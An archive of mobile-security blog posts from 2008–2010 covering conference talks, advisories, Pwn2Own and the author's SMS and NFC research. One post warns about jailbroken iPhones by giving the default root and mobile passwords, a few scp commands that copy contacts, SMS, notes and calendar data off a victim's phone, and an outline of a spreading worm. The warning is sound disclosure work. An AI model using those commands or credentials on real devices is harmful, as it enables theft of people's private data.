Black Hat USA 2010 talks: Base Jumping: Attacking GSM Base Station Systems and mobile phone Base Bands by The Grugq. I'm really wondering about this talk. You will be billed $90,000 for this call by Mikko Hypponen. This talk sounds like fun. More Bugs In More Places: Secure Development On Moble Platforms by David Kane-Parry. Attacking phone privacy by Karsten Nohl.

Too bad that I decided to skip most cons this year. But PH-Neutral coming up this weekend. See u guys there!

Mobile Security News Update May 2010

Tue, 18 May 2010 11:27:00 GMT

EuSecWest moved to June and to Amsterdam but still looks promising. So far two talks look interesting: Immature Femtocels by Ravishankar Borgaonkar & Kevin Redon, Technical University of Berlin and BlackBerry Proof-of-Concept malicious applications by Mayank Aggarwal, SMobile Systems. I hope to see more mobile stuff at EuSec. I would really like to go but I have too many other stuff todo.

Somebody claims to have found a iPhone data protection vulnerability . I haven't checked it out myself.

Waiting to see some of you at Ph-Neutral. Only 2 weeks to go!

Mobile Security News April 2010 Part 2

Wed, 28 Apr 2010 12:37:00 GMT

Confidence in Krakow has a few interesting talks. Especially the GSM/Cell Networks and telephony security by Don Bailey and Nick DePetrillo - this should be the stuff from SourceBoston. Android Reverse Engineering - Workshop by Jesse Burns. Mobile attacks and preventions - how security will change the mobile market by Tam Hanna. And The Four Horsemen - Malware for mobile by Axelle Apvrille.

I'm seriously considering going there.

Mobile Security News April 2010

Fri, 23 Apr 2010 10:32:00 GMT

while going through my morning RSS feeds I stumbled across this simple but cool SMS-based attacks against WebOS (Palm's PRE). The attacks are based on simple SMS text messages that contain iframes. The bugs where found in WebOS 1.3.5 and are fixed in the current version. Read the full details on the blog of /intrepidus group the researchers who found these bugs. I especially like the phone dialing stuff where they inject so-call GSM codes in order to switch of the GSM radio. Nice. Too bad I was a little behind with WebOS :-(

Conferences: SourceBoston 2010: Attacking WebOS by Chris Clark and Blackberry Mobile Spyware - The Monkey Steals the Berries (Part Deux) by Tyler Shields.

As usual I call for hints and tips on interesting papers/slides/website on mobile security.

Update:

There seems to be another mobile security related talk at SourceBoston. We Found Carmen San Diego by Don Bailey, iSec Partners & Nick DePetrillo. Reading the abstract this looks like Locating Mobile Phones using Signalling System #7 by Tobias Engel at 25C3 in 2008. He also didn't have direct access to SS7 but used a web-based interface to some parts of SS7.

Update 2:

I just got an email from Michael he discovered that WindowsMobile 6.5 is also vulnerable to SMS messages that contain HTML and JavaScript. He posted a small advisory yesterday after reading about the Palm Pre stuff. His advisory is here: XSS and Content Injection in HTC Windows Mobile SMS Preview PopUp.

Random Tales of a Mobile Phone Hacker

Sat, 27 Mar 2010 03:02:00 GMT

CanSecWest is just over - it was a real nice conference and I'm looking forward to come here again.

The slides for my talk Random tales of a mobile phone hacker are available here. The most interesting part should be my mobile phone HTTP header logging and analysis. See also this story.

I've put up a test page where you can check if your operator leaks your private data such as your mobile phone number (MSISDN), IMSI (SIM card ID), or IMEI (phone hardware ID). The test page is here: www.mulliner.org/pc.cgi. I promise that I don't log any data when visiting this page.

Mobile Security News March 2010

Tue, 09 Mar 2010 13:33:00 GMT

Two stories I want to comment on:

FatSkunk software-based attestation as a solution to mobile malware. Article by the German Technology Review. They promise a lot. I don't think this will work as advertised (I haven't seen this at work - also I can't really find a paper about it).

Smartphone Weather App Builds A Mobile Botnet. So these guys created a classic trojan application (does something very simple and useful but has a malicious part too). Of course people will download the application from some trusted website - nothing to wonder about.

Just found another mobile security talk that will be held at CanSecWest: Stuff we don't want on our Phones: On mobile spyware and PUPs - Jimmy Shah, McAfee, Inc

Update March 9th:

Hack-in-the-Box conference

Base Jumping: Attacking GSM Base Stations and Mobile Phone Basebands

Open Sesame: Examining Android Code with undx2

Mobile Security News February 2010 Part 2

Tue, 23 Feb 2010 14:31:00 GMT

Just links...

Gartner Says Worldwide Mobile Phone Sales to End Users Grew 8 Per Cent in Fourth Quarter 2009; Market Remained Flat in 2009 so you know what OS/platform you want to PWN this year :-)

NeoPwn = BackTrack Mobile NeoPwn Merges with BackTrack. Produces BT Mobile for #N900 it seems that WiFi driver for the nokia N900 (wl1251) was patched for RFMON and injection.

Android link collection mostly OS and security stuff

...thats it!

CanSecWest 2010

Wed, 17 Feb 2010 10:14:00 GMT

Yea I will be going to CanSecWest for the first time this year. I'll have a talk on my favorite subject: Mobile Phone Security (Random tales from a mobile phone hacker). I'm really looking forward to this!

Second, there will be a mobile phone PWN2OWN again this year. They increased the cash pool for mobile devices to $60K, this looks like a statement! The devices/platforms are: iPhone (of course), BlackBerry, S60 (Nokia), Android.

Mobile Security News February 2010

Tue, 02 Feb 2010 10:30:00 GMT

SecurStar did it again in 2006 there was RexSpy and in 2010 we have this mobile phone crypto comparison. But the knowledgeable community is big enough to identify and point out this kind of advertising/scam fast enough.

Conferences, the only interesting talk I found is: iPhone Privacy by Nicolas Seriot at Black Hat DC this week.

In other news, I still need a Nexus One. It is still not available to buy out side of the US. *ARG*

Updated (Feb 2nd):

iPhone PKI handling flaws

Mobile Security News January 2010

Fri, 15 Jan 2010 11:27:00 GMT

I have been busy as hell from mid December to now, this was due to the Chaos Communication Congress (26C3), the fact that I turned 30, and some work stuff. I guess I have missed some interesting stuff in this time. So once again if you have interesting things on mobile security tell me!

Conferences, ShmooCon taks place in February (I always wanted to go - still haven't made it). The New World of Smartphone Security - What Your iPhone Disclosed About You by Trevor Hawthorn. Karsten is doing his GSM: srsly talk again. Bluetooth Keyboards: Who Owns Your Keystrokes? by Michael Ossmann, for some time I did a lot with Bluetooth keyboards so I would really like to see what they show here - especially since Michael Ossmann is one of the guys who really knows about Bluetooth. honeyM: A Framework For Virtual Mobile Device Honeyclients by whole bunch of Military guys (SCNR). Blackberry Mobile Spyware - The Monkey Steals the Berries by Tyler Shields. So it really looks like ShmooCon has some mobile security content this year.

Random news:

Android Phishing app in the Market

Study of BlackBerry Proof-of-Concept Malicious Applications

Fun find:

Abhoersichers Handy

Mobile Security News December 2009

Fri, 18 Dec 2009 14:06:00 GMT

very short update...

SRI published an analysis of Ikee.B here: www.csl.sri.com/users/porras/iPhone-Bot.

I wrote about this stuff about a year ago here ;-)

Mobile Security News November 2009

Mon, 07 Dec 2009 10:59:00 GMT

so I was quite busy with various projects therefore this update is really really late.

The most interesting thing that happened recently was the jailbroken iPhone SSH fuck up. See: 1 and 2. There are many other stories on this all over the net, also by now this is kind of old. The interesting thing actually is that I investigated this jailbroken iPhone SSH problem in August of this year. Including a nice statistic and some measurement. I'm planning to show this stuff together with some other work at some conference (academic and hacker) next year (talks/papers are submitted).

Conferences, I attended DeepSec in mid November, this was great fun. Including some good mobile phone security talks. At the upcoming 26C3 there will also be a bunch of talks on mobile phone security. Location tracking does scale up, GSM: SRSLY?, Playing with the GSM RF Interface, Using OpenBSC for fuzzing of GSM handsets, and SCCP hacking, attacking the SS7 & SIGTRAN applications one step further and mapping the phone system.

I actually planed to not attend 26C3 because last year kind of sucked, especially because there were way too many people. So this year I will go to some talks but not hangout at the conference. If you want to hangout during CCC give me a call or write me an email. Although my talk on SMS fuzzing was rejected I recently was asked if I would do it if they find a spot in the schedule. Of course, I would do it.

Recent papers: iPhonePrivacy.pdf shows some privacy issue with the iPhone platform. Nothing really surprising, but a good read.

I know I missed several things in this post but I kind of have info overkill in the last weeks. Please send me hints hints hints!!!

Mobile Security News Update October 2009 part 2

Mon, 19 Oct 2009 13:22:00 GMT

Conferences: PacSec 2009 Charlie Miller is giving a talk on iPhone SMS Fuzzing and Exploitation, Rich Cannings & Alex Stamos are giving titled The Android Security Story: Challenges and Solutions for Secure Open Systems, and Yves Younan is giving a talk on Filter Resistant Code Injection on ARM (this sounds interesting). So PacSec seems to be filled with some good mobile security related talks.

Btw. the CanSecWest CfP is open now. I have something to submit but it will be complicated because of some academic conference. Let's see what happens.

Bug watch:

Floating Point thingy in the browser

Links:

Dangers of Customized Android ROMS and Malware

Internet per UMTS: So fälschen deutsche Provider Webinhalte

Mobile Security News October 2009

Tue, 06 Oct 2009 10:37:00 GMT

the guys from the Mobile Security Lab seem to have a lot of time recently a couple of days ago they released a short study on SSL on mobile phones: Tricks for Defeating SSL: effectiveness test on mobile phones.

Tomorrow (7th of October) Hack-in-the-Box 2009 takes place in Malaysia for some reason I always forget HITB. I can't remember ever reading a CFP or anything. They seem to have a few mobile security related talks. Here is the Agenda. Bugs and Kisses: Spying on BlackBerry Users for Fun by Sheran Gunasekera, Side Channel Analysis on Embedded Systems by Job De Haas.

Bug watch:
Palm Pre WebOS <=1.1 Remote File Access Vulnerability The short description is: The Palm Pre WebOS <=1.1 suffers from a JavaScript injection attack that allows a malicious attacker to access any file on the mobile device. Things get more and more interesting with web stuff on smartphones.

On October 9th the CFP ends for:
26C3: Here Be Dragons (26th Chaos Communication Congress)
December 27th to 30th, 2009 in Berlin, Germany

They always like mobile phone related talks, so go and submit something interesting.

Mobile Security News September 2009 p2

Thu, 17 Sep 2009 10:28:00 GMT

Lets start with conferences again. I'll be speaking at the 5th Annual Mobile Device Management and Security Forum this is a more high level non-technical conference, haven't been to stuff like this so it should be interesting. Another speaking event will be at the TelekomForum - Mobilfunktrends 2010 in Bonn, lets see how this goes.

Michael Mueller of silentservices.de found some nice SMS/MMS/Wap Push bugs in various smart phones. The bugs allow to spoof/obfuscate the sender address/number of MMS messages. This could be used for spam or social engineering I guess. The advisories are here and here.

The guys from the Mobile Security Lab published a primer on Service Load (SL) attacks. I haven't had time to read it yet. You can find it: here

So stuff happens in the mobile security world.

SEC-T was real good!

Sun, 13 Sep 2009 12:04:00 GMT

SEC-T was a nice event, I had a good time. The location was nice, the talks were good and I talked to some interesting people.

Some highlights: a reverse engineering challenge, a Wifi antenna building contest, and a bar quiz (a nerdy one). The best part, the team I was on won the quiz *G*

Bonus. I had the chance to play with a Nokia N900 (the Nokia Linux smart phone). This is a sweet device.

The latest shit from me :-)

Mon, 07 Sep 2009 16:00:00 GMT

Vorsicht - ansteckend! (in German) something about mobile phone malware, this was even printed *G*

Researchers discuss iPhone, SMS bug Interview done by NetworkWorld at Black Hat this year.

I rather should be doing slides but I don't want to right now.

Mobile Security News September 2009

Wed, 02 Sep 2009 13:24:00 GMT

Upcoming conferences:

#T2 in Helsinki October 29-30 will have a two talks first Forensics on GSM phones by David Batanero and second Spying via Bluetooth by Jamo Niemela. Especially the talk on phone forensics would be very interesting for me since lately the subject was brought to my attention by multiple people. David Batanero was also scheduled to talk at SEC-T in September but his talk was cancelled, too bad since I'm going to SEC-T but not #T2. As far as I can see my talk is the only mobile security talk at SEC-T this year.

DeepSec in Vienna on November 19-20 will have two mobile security talks. First Hijacking Mobile Data Connections 2.0: Automated and Improved by Roberto Piccirillo and Roberto Gassir (Mobile Security Lab) and second A practical DOS attack to the GSM network by Dieter Spaar.

Btw. I'll actually attend DeepSec this year. I'm looking forward to it since it will be my first time at DeepSec, and Vienna is a fun city.

Other interesting developments:

The various GSM cracking projects seem to be taking off this time around. The people behind AirProbe and Creating A5/1 Rainbow Tables seem to really want to build something that is easy usable. I really wait for the day this stuff is done and anybody with a old GSM phone has to be worried that someone with hardware for about 100 Euros can listen to his/her phone calls and can read his/her text messages (SMS).

I recently I had a fun idea for this idea I want/need a list of hardware that has a build-in mobile phone or GSM modem. If you know of such hardware please tell me (collin[AT]mulliner.org or comment on this post). Please don't tell me about laptop/netbook X with a build in modem but rather about your fridge or microwave that can call or text. So this is a call for hardware with embedded mobile phones!

Mobile Security News August 2009

Thu, 27 Aug 2009 14:16:00 GMT

this blog post is long overdue, but due to traveling and catching up on work this had to wait.

Black Hat USA had quite a few mobile security related talks, the slides are here: Exploratory Android Surgery by Jesse Burns (haven't read this yet), Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone by Vincenzo Iozzo and Charlie Miller. Attacking SMS by Zane Lackey and Luis Miras, Is Your Phone Pwned? Auditing, Attacking and Defending Mobile Devices (only the white paper - no slides so far) by Kevin Mahaffey and Anthony Lineberry and John Hering. The stuff for our talk Fuzzing the Phone in your Phone by Charlie Miller and myself is here.

It was nice to see that Zane and Luis took my MMS research and followed some ideas I had and made them work. Especially the part about running a your own MMSC (MMS Server). At the point in time where I tested this it did not work because the WAP-gateway that is configured in the MMS profile only connects to the MMSC of the mobile operator. I tested this with multiple US providers and some German providers in 2005/2006. I guess I have to do some testing here in Germany to see if anything changed for our local operators.

HAR2009 had a few interesting talks too. In no particular order: Cracking A5 GSM encryption by Karsten Nohl, Public transport SMS ticket hacking by Pavol Luptak, OpenBSC - running your own GSM network by Harald Welte (the slides are the same as the 25C3 slides), Airprobe - Monitoring GSM traffic with USRP by Harald Welte (could not find any slides, somebody took notes and put them here).

Did anything else happen in August? I think there was something but I can't remember. Hints welcome!

Speaking at SEC-T

Thu, 20 Aug 2009 08:58:00 GMT

It looks like I'm going to speak at SEC-T in Stockholm (Sweden). I'll talk about the SMS Security Research I've done together with Charlie Miller.

I'm really looking forward to go to Stockholm since I love both Sweden and Stockholm!

USENIX Security 2009

Thu, 13 Aug 2009 19:45:00 GMT

currently I'm hanging out at USENIX Security in Montreal. Talks are quite good and Montreal is a nice city to visit.

I just found out that our paper Injecting SMS Messages into Smart Phones for Security Analysis is already available for download. I also uploaded my slides for the talk. It is available on my SMS Security Research page.

SMS Security Research

Fri, 07 Aug 2009 03:45:00 GMT

I just created the SMS security research page in order to publish the slides from our (Charlie and myself) talk at Black Hat USA 2009 titled: Fuzzing the Phone in your Phone.

The injection frameworks for the iPhone, for Android, and for Windows Mobile are available for download just now. Charlie provided his Sulley fuzzing test cases. The page is far from complete as we have more tools and scripts to share. But since I'm on vacation/business trip (depending on the actual day) I didn't find time to sort it all out.

I also updated my iPhone Security page with the link to Apple's security advisory for the vulnerability we reported. iPhone OS 3.0.1 fixes this vulnerability.

Mobile Security News July 2009

Sun, 19 Jul 2009 18:23:00 GMT

SexyView a Symbian Virus/Worm or bot(net)? I really don't care too much about viruses, so until this thing has a real control channel and can auto-update it is nothing. The one thing that I find interesting about it is the fact that it seems to be signed. This more or less proofs that signatures don't buy you any security. One can always somehow obtain a signature for a piece of malware. This is as good as having no signatures at all - well not exactly it still puts the bar a little higher.

The Windows Mobile HTC OBEX path traversal bug is interesting. Not because it is new but rather that this kind of bug made it once again into a device. So I guess no quality control at HTC. Alberto, the guy who found and reported the bug, told me that HTC was not really interested in communicating with him. This is sad since HTC will also be building their own Android devices soon. I just read that HTC seems to offer a hotfix for the issue.

On a personal note. As I wrote before I'll be going to Black Hat and Defcon in Vegas. Directly after Vegas I'll travel to the Valley (Los Altos and Mountain View). Before going to Montreal for USENIX I will spend some time around Santa Barbara. So if anybody is up for some mobile phone security stuff contact me.

Otherwise see you in VEGAS!

Pwning Nokia phones (and other Symbian based smartphones)

Mon, 06 Jul 2009 14:31:00 GMT

Bernhard Mueller from SEC Consult posted this fine work on Symbian security to the full disclosure list. His white paper Pwning Symbian looks interesting (I haven't actually read it completely yet).

Mobile Security News June/July 2009

Fri, 03 Jul 2009 13:27:00 GMT

I guess it is time again for a news update. I actually wanted to write one for June but I somehow forgot.

Let's start with the most recent stuff. Charlie Miller partially disclosed what we are going to talk about at Black Hat at the end of the month. Sadly some reporter over hyped his story. This sucked btw! Here are the original (over hyped) and the actual facts stories.

The HAR2009 program is out and there will be some mobile phone security related talks. Public transport SMS ticket hacking seems to talk about how to hack a SMS-based ticketing systems. cracking a5 gsm encryption will do a state of the art talk. There will also be a OpenBSC talk that will show how to build and run a GSM network based on opensource software an hardware everybody can buy. All in all HAR seems to be quite some fun. Sadly I wont be able to go due to time conflicts.

Fun find on BugTraq: Multiple Flaws in Huawei D100. The Huawei D100 is a small home 3G router (product page) that seems to be given out by some ISPs.

A personal side note: I now own/have-full-access-to a BS-11 Abis GSM base station and will soon start to play around with it. Happy happy fun fun.

Two NewOld Mobile Phone Advisories Posted

Thu, 18 Jun 2009 10:21:00 GMT

I've been waiting for quite some time to publish the full details of the iPhone Safari Phone-auto-Dial vulnerability. But since Apple included it again in the just published security fixes for iPhone OS 3.0 I decided to finally go ahead and publish the details. The examples in the advisory show only the original bug also we found some variations of it, we didn't put any examples in the advisory.

iPhone Safari Phone Auto-dial Vulnerability also see my iPhone page.

I'm also credited, together with many others, for reporting the issue that Mail loads remote images when displaying HTML emails. The problem is actually a little bit bigger since also iframes are loaded. I actually showed them a demo where I can start QuickTime from Mail without user interaction. Do I need to say more?

The second advisory is about the Nokia 6212 classic an Near Field Communication mobile phone. I did a full disclosure of the bugs at 25C3 in late December 2008 but I never published an actual advisory. I do this now.

Nokia 6212 Classic URI Spoofing and DoS vulnerabilities also see my NFC page.

Mobile Security News May 2009

Sun, 24 May 2009 19:46:00 GMT

First of all conferences. EUSecWest is taking place the coming week in London. It will feature multiple mobile security related presentations. First Charlie Miller and Vincent Iozzo each have a iPhone related talk. Second Petr Matousek will speak about rootkits on Windows Mobile/Embedded and third Ralf-Philipp Weinmann will talk about DECT decryption. Looks like EUSecWest will be an interesting place to be this coming week.

Right after EUSecWest PH-Neutral is taking place in Berlin where I will be showing of a small side project on mobile phones and web usage. Many other interesting talks will be held as usual.

Black Hat USA started to announce the speaker lineup for this year and yes I'm one of the speakers. Together with Charlie Miller we will talk about SMS Fuzzing. So far Black Hat seems to become very strong on mobile phone security this year. Jesse Burns will talk about Android, Zane Lackey and Luis Miras will also have a talk on SMS but from the description they took a different angle than Charlie and myself. John Hering from Flexilis also seems to have gotten accepted with a mobile phone related talk that sounds very interesting Is your phone pwned? Auditing, attacking, and defending mobile devices. Last but not least Charlie Miller and Vincent Iozzo will do an iPhone talk. I actually hope for more mobile phone related talks, lets wait and see.

The Nokia 1100 story is getting more and more annoying. In this article it is reported that this company called Ultrascan replicated the SMS interception. No technical details of course. So now I'm looking for people who are interested in the topic and who would also like to understand this and possibly replicate it.

See you at PH-Neutral this weekend!

Update:

So it seems Google/HTC pushes Android security updates without publishing a change log. WTF?!? Any rumors about what this is about?

Mobile Security News April 2009 part 2

Wed, 29 Apr 2009 01:03:00 GMT

just a quickie, the slides from BlackHat Europe are up for a few days. Here are the slides for Hijacking Mobile Data Connections and for Passports Reloaded Goes Mobile (clone a RFID passport using an NFC mobile phone). So far Charlie Miller and Vincenzo Iozzo only put up a whitepaper of their OS X and iPhone talk.

If you can understand German (spoken word) you might want to listen to Chaosradio Express episode 120 which is about OpenBSC and generally about building GSM networks or actually the software to run a network in your cellar/garage.

In the last week there was a short buzz about a old Nokia phone (Nokia 1100) that could be reprogrammed to sniff SMS messages. The story really sounds like a hoax since the whole subscriber ID stuff is handled through the SIM card rather then through the phone itself. There are not many details just the story. F-Secure has something in their blog about this too.

Yesterday the new Android version cupcake was released for developer phones, get your cupcake while its still warm :-) Get it from here.

Btw the Technology Review article citing me is only in the next issue (06.2009).

Mobile Security News April 2009

Sat, 18 Apr 2009 18:01:00 GMT

BlackHat Europe brought some new stuff:

First the guys from the Mobile Security Lab showed us that the OMA provisioning functionality can be easily abused to reconfigure the Internet connection settings on many mobile phones. Although the attack requires some user interaction and therefore some social engineering the attack is quite cool. Technology Review has an article on their work. Nice Work guys!

The second mobile device related piece from BlackHat Europe is that Charlie Miller showed a workaround for the non-executable memory of the iPhone. I haven't see the slides of his talk but NetworkWorld has an article on Charlie's iPhone find.

I was interviewed by the German version of Technology Review on the subject of smart phone security and malware. As far as I know the article citing me should be in the current issue (05.2009).

Otherwise not much happened in the world of mobile device security.

Mobile Security News March 2009

Thu, 26 Mar 2009 16:24:00 GMT

few things happened besides Pwn2Own. One thing I missed about the mobile pwn2own is that Sergio Alvarez apparently tried to own a BlackBerry device but failed due to device/software mismatch. Hey at least he seems to have a exploitable bug for BlackBerry, nice!

Since today the slides for CanSecWest are online. The mobile security stuff is here: 1 2 3 4

At the upcoming BlackHat Europe some guys from the Mobile Security Lab will give a talk on Hijacking Mobile Data Connections . This sounds interesting too bad I can't go.

Feedback is welcome, any good sources to recommend? Any mailing lists?

Some notes on Pwn2Own Mobile

Sat, 21 Mar 2009 09:07:00 GMT

so it looks like Pwn2Own mobile failed the first time it was around. This is a surprise for me.

Pwn2Own is over, all mobile devices remain unscathed. #cansecwest

I would have guessed that the iPhone would be have been taken even it's Non-Exec-Memory since many more people try to break it in comparison with the other mobile platforms.

Symbian was the only mobile platform somebody tried to pwn?

#cansecwest we've got someone trying the Symbian phone now- stand bye

This is a bigger surprise to me. Especially since Pwn2Own only offers a Nokia N95, a device that has Non-Exec memory. I tried to closely follow Pwn2Own mobile so when I first saw that Symbian was in the game I thought this will be uninteresting since they will take a brand new device with Non-Exec memory. When I read about the Nokia E61 in this announcement I was really happy since this device doesn't have Non-Exec memory. In the latest announcement the E61 seems to have been removed. Possible because the figured out that it was way to old, bummer.

I actually predicted that somebody will own the Windows Mobile device and the Android G1 but they all survived. Maybe all the bugs were already reported to the manufacturers before mobile pwn2own was announced so they could not be cashed (I at least know about one case). So I guess people will hold on to their (mobile) bugs until next year's CanSecWest/Pwn2Own. Especially now that some well known people called for their no more free bugs campaign. One last point that I found nice was that for mobile pwn2own the goal was not necessary code execution but 1) loss of information (user data) OR 2) incur financial cost. My iPhone phone call bug would probably have counted, so I guess I should also keep bugs for myself now.

Mobile Security News February 2009 Part 2

Tue, 24 Feb 2009 10:32:00 GMT

SIMKO2 is the new super secure smart phone for German government officials. According to heise.de the device is based on HTC touch pro and runs a hardened version of Windows Mobile. The device and all it's communication with the outside is going to be encrypted using a micro-sd smartcard (see here). Also the SIMKO2 devices seem far from being deployed since they seem to have some performance issues with the encryption, see here, also heise.de reports that the SIMKO2 devices are faster then the original touch pro. If you can read german you should check out these three links: 1 2 3.

Sexy View is the first signed Symbian worm (makes it the first effective worm for S60 3rd edition). The worm spreads through simple social engineering, it sends a SMS to every contact in the contact list of an infected phone. The SMS simply contains a URL to the worm's SIS file on the internet. What I find interesting is the payload of the worm, since it doesn't seem to send any premium rate SMS or MMS but collects information about the phone (IMEI) and the SIM card (probably IMSI and MSISDN). This makes me wonder what these information are being used for or maybe used for in the future. Fortinet thinks that the worm could be the first step of a mobile botnet, also there is no proof yet that the worm contains any update or remote control mechanism. This could be a really interesting thing in the near future.

The mobile bug of the week is a XSS attack against a HSDPA router using SMS, see here. Like most routers the Huawei E960 is controlled via a web interface. The interesting feature of the E960 seems to be that it displays un-escaped SMS messages in the web interface and therefore can be exploited through SMS messages containing HTML and JavaScript. The attack is really funny, also I think it is quite impractical since the victim would need to load the router configuration page in his web browser in order to trigger the attack. Never the less this is a great attack!

Mobile Security News February 2009

Thu, 12 Feb 2009 21:24:00 GMT

This year's CanSecWest will have a good amount of smart phone security related talks besides the earlier announced mobile pwn2own contest. Talks seem to be focused on the iPhone and the Android platform. 1) Alfredo Ortega and Nico Economou - Multiplatform Iphone/Android Shellcode, and other smart phone insecurities 2) Jon Oberheide - A Look at a Modern Mobile Security Model: Google's Android and 3) Sergio 'shadown' Alvarez - The Smart-Phones Nightmare. I suppose Sergio Alvarez is also going to talk about the iPhone since Apple fixed multiple bugs that he submitted in the iPhone 2.2 update. I'm a bit sad that I can't attend CanSecWest.

At BlackHat Europe Jeroen van Beek will show his NFC-phone-based e-Passport cloning tools. Maybe there is even more mobile security stuff going on there since the speaker list is not yet complete.

Done with conferences for this post. The guys from the Mobile Security Lab just launched their poc site where people can test their phones using exploits developed by the mobile security lab. Nice idea!

Last weekend at ShmooCon Charlie Miller released details on a vulnerability in Android's audio player. Some links: 1 2

Related news: Palm has finally killed PalmOS. I really waited a long time for this to happen. PalmOS was just way past its time. This a good and sad thing but now its over.

Did I miss anything?

Mobile Security News January 2009

Sat, 24 Jan 2009 14:50:00 GMT

I just read that CanSecWest's Pwn2Own is going mobile this year. It looks like they are going to have an iPhone, a Android (should be a G1), a Symbian, and a Windows Mobile device too pwn and own. I wonder how the rules are going to be for these devices. via twitter

Second part. There seems to be the first mobile phone ~~banking~~ micro payment trojan out in the wild according to Kaspersky Labs. The trojan targets a micro payment service that allows transfer of money and minutes between users of the service using SMS. Another interesting part of the story is that the trojan is just a modified version of an existing premium SMS trojan. Stories: 1 2.

NFC/NDEF Tool Update (from 25c3)

Thu, 15 Jan 2009 12:24:00 GMT

I've just uploaded the latest version of my NFC/NDEF tools. This is the version that I presented at my talk at 25C3. I mainly added some parsers for the new NDEF records supported by the Nokia 6212 Classic. Also included are some bug fixes and a small fix to talk to the BtNfcAdapter running on the Nokia 6212. I further included some more attack samples and an updated version of my ndef_mifare reader/writer tool.

At 25C3 I had the chance to take a look at Motorola's L7 NFC phone that is used by Deutsche Bahn Touch and Travel. The phone is not a real NFC phone, Motorola just replaced the battery lid with a lid that also contains the NFC hardware (or maybe only the antenna). The only NFC functionality the phone supports is the Touch and Travel application. What is really bad is that the user first needs to start the application and then hold the phone up to the Touch Point. WTF? How is this going to be a good user experience? The Nokia phones constantly scan for NFC tags and start the appropriate application as soon as one holds the phone up to a tag.

Finally I have noticed that RMV ConTags are starting to appear all over the place out side Frankfurt/Main. Also they only seem to be placed at big stations like the Darmstadt main station (Hauptbahnhof) but not inside the city. As always I like to know about interesting new NFC services around Europe and especially Germany.

HTC Touch vCard over IP Denial of Service

Fri, 19 Dec 2008 19:55:00 GMT

here is another nice Windows Mobile (HTC) security bug that is related to WAP push. The vulnerability can be triggered by sending vCards to port 9204/UDP over either WiFi or GPRS/UMTS. The effect seems to be significant device slow down and/or device freezing that requires battery removal. This again reminds me of my good all MMS Notification DoS attack.

The bug was discovered by the Mobile Security Lab (who ever this is). I hope we will see more interesting discoveries from them, they just seem to have setup their site in October.

The Danger of Jailbroken iPhones (not really news)

Fri, 19 Dec 2008 14:10:00 GMT

first, I known I'm not the first one to write/warn about this so don't flame me for it.

I recently jailbroken my iPhone so I could take a closer look at the iPhone and it's OS. As most people I just used the PwnageTool from the iPhone Dev-Team. It is easy, fast and just works. So what most people forget is that the jailbroken iPhone OS comes with an ssh server and that the root and mobile users have their password set to alpine (mobile password is dottie). This basically means that everybody can log into every jailbroken iPhone as user root. When I jailbroke my iPhone I didn't change my password right away since I was too busy playing with the new features and I strongly believe that many other people never changed the password of their jailbroken iPhone.

Again the danger lies in public Wifi hotspots or any other situation where you share Wifi with people you don't know. A good example is the upcoming Chaos Communication Congress which has one of the most hostile (wireless) networks I know.

So what can happen if you leave your iPhone's password unchanged? That is what I cooked up the last few nights.

The Basics:

Anyone can log into your iPhone as user root and/or mobile
Anyone can copy files to and from your iPhone using scp

In further detail this means all your private data is gone, just like this:

SSH_PARAMS="-q -o NumberOfPasswordPrompts=1 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"
scp $SSH_PARAMS root@$IP:/var/mobile/Library/AddressBook/* /tmp/yourdata/
scp $SSH_PARAMS root@$IP:/var/mobile/Library/SMS/* /tmp/yourdata/
scp $SSH_PARAMS root@$IP:/var/mobile/Library/Notes/* /tmp/yourdata/
scp $SSH_PARAMS root@$IP:/var/mobile/Library/Calendar/* /tmp/yourdata/

The code shown above simply copies your Addressbook, SMS, Notes, and Calendar from your iPhone using scp (secure copy - part of ssh). I know there is much more to steal like: photos, email, or vpn configuration. This attack is so simple everybody can do it without any special knowledge or tools.

Getting your personal data stolen can happen to you anywhere but there is another threat that is more likely at events like the Chaos Communication Congress, defcon, and any other conference with a high number of jailbroken iPhones: a worm.

A worm that simply spreads using ssh/scp and the default root/mobile password can be written in bash (which is installed on all jailbroken iPhones) in about 4 hours. The worm just (tries to) copies itself (a bash script) to every host on the local wifi network in the background. Background tasks can be easily setup using launchd. Just add a new task that runs the worm shell script every couple of minutes. This is no big deal for anyone with just basic understanding of ssh,scp,bash, and launchd/launchctl. I was able to do this in an evening mainly using Google to get the appropriate launchd plist syntax.

Don't get me wrong, I don't want to encourage anyone to do all this. I just show you how damn easy this is. So please change your root/mobile password on your jailbroken iPhone - or somebody else will do it for you.

Btw. if you are looking for the images that the iPhone takes about anything you do some of these are located here: /var/mobile/Library/Caches/Snapshots (of course this is not new either see here).

NFC Paper @ ARES 2009

Fri, 12 Dec 2008 19:33:00 GMT

today I submitted the camera ready version of my paper Vulnerability Analysis and Attacks on NFC-enabled Mobile Phones to the Workshop on Sensor Security at ARES 2009. Finally a academic publication again. Done this now I'm official on Christmas vacation until 25C3.

iPhone Safari Phone Call Bug

Thu, 20 Nov 2008 23:39:00 GMT

Today we published a small security bug present in the iPhone OS until version 2.1. The bug is small but has big impact in the way that it can be used to call arbitrary phone numbers from visiting a website.

More details including a video (but not full-disclosure) can be found here (German only): www.sit.fraunhofer.de/pressedownloads/pressemitteilungen/iPhoneHack.jsp

We will do a full-disclosure as soon as the update is out and people had time to install it. Details will be available here.

NIST Guidelines on Cell Phone and PDA Security

Tue, 04 Nov 2008 13:11:00 GMT

NIST just released their Guidelines on Cell Phone and PDA Security here are some comments from my side.

Overall I think the document is quite good covering the field well. My main point of critic is the way they present their references. The document cites many news sites instead of the original publisher's site/document. Therefore some of the references are more or less useless since they don't provide the path to more detailed information. I not only write this because they quote theregister on my MMS vulnerability but also because of quoting zdnet on various other vulnerabilities rather than the original advisories. To make it clear I don't think the articles by these news sites are bad or wrong, I just think people reading NIST publications expect a little more detail.

WindowsMobile Vulnerable to WAPPush Attacks

Tue, 21 Oct 2008 09:11:00 GMT

This post in the XDA-Developers forum shows that Windows Mobile 6 on HTC devices is vulnerable to malicious WAP Push SI (Service Indication) and SL (Service Load) messages. An attacker can send a message containing a URL to an executable, the executable will be automatically downloaded and executed WITHOUT any user interaction. The problem is that HTC disabled the security settings for these kinds of WAPPush messages, normally a device should only accept these kinds of messages from trusted originators (e.g. your service provider - don't know if I want this either).

The fix to this problem is very easy as it just requires modification of a few keys in the mobile phones registry (yes Windows Mobile has a registry). (The steps to do this modification is described in the original advisory.)

The bug is kind of similar to one of the MMS-based bugs I discovered 2 years ago where the Windows Mobile devices would accept WAPPush messages over UDP (WiFi).

